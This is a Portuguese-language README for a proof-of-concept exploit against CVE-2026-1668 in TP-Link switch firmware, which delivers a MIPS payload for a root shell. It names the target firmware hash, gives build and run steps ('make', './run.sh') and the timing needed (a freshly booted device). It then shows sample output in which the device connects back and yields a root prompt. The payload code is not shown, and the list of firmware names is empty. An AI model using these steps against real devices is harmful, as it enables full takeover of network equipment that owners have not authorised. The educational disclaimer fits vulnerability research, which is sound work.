
Prova de conceito de exploit para CVE-2026-1668 no firmware de switch TP-Link, entregando um payload MIPS que fornece um shell root em dispositivos vulneráveis.
Este é um exploit de prova de conceito para CVE-2026-1668. Destina-se puramente a fins educacionais. Por favor, não tente explorar sistemas que você não possui ou para os quais não tem permissão explícita de explorar.
Esta prova de conceito foi desenvolvida contra uma imagem de firmware com o seguinte hash SHA256: 4b862b8dd7fde44fa57a39b35b562f21878dd6abb8e92ccd9cdef571ed60d544.
Nomes de firmwares conhecidos por corresponder a esse hash (não exaustivo):
Versões de firmware anteriores provavelmente também são vulneráveis, mas podem exigir pequenas alterações no payload do exploit.
Uma explicação de como o payload funciona pode ser encontrada neste post de blog.
Uma toolchain GCC MIPS Linux é necessária para compilar o payload. No Ubuntu 24.04, uma pode ser instalada com sudo apt install gcc-mips-linux-gnu.
$ make
Este exploit deve ser executado antes que o servidor HTTP tenha atendido sua primeira requisição (ou seja, em um boot recente).
$ ./run.sh
O script deve te deixar em um shell root. Caso contrário, o exploit falhou.
[*] Sending payload
HTTP/1.1 200 OK
Server: Web Switch
Connection: close
Content-Type: application/json
{"data":{"mByCtrl":0,"includePrivacyPolicy":0,"includeAutoCheck":1,"includeSshController":1},"errorcode":0,"success":true,"timeout":false}
[*] Connecting back to get a shell
/bin/sh: can't access tty; job control turned off
/etc #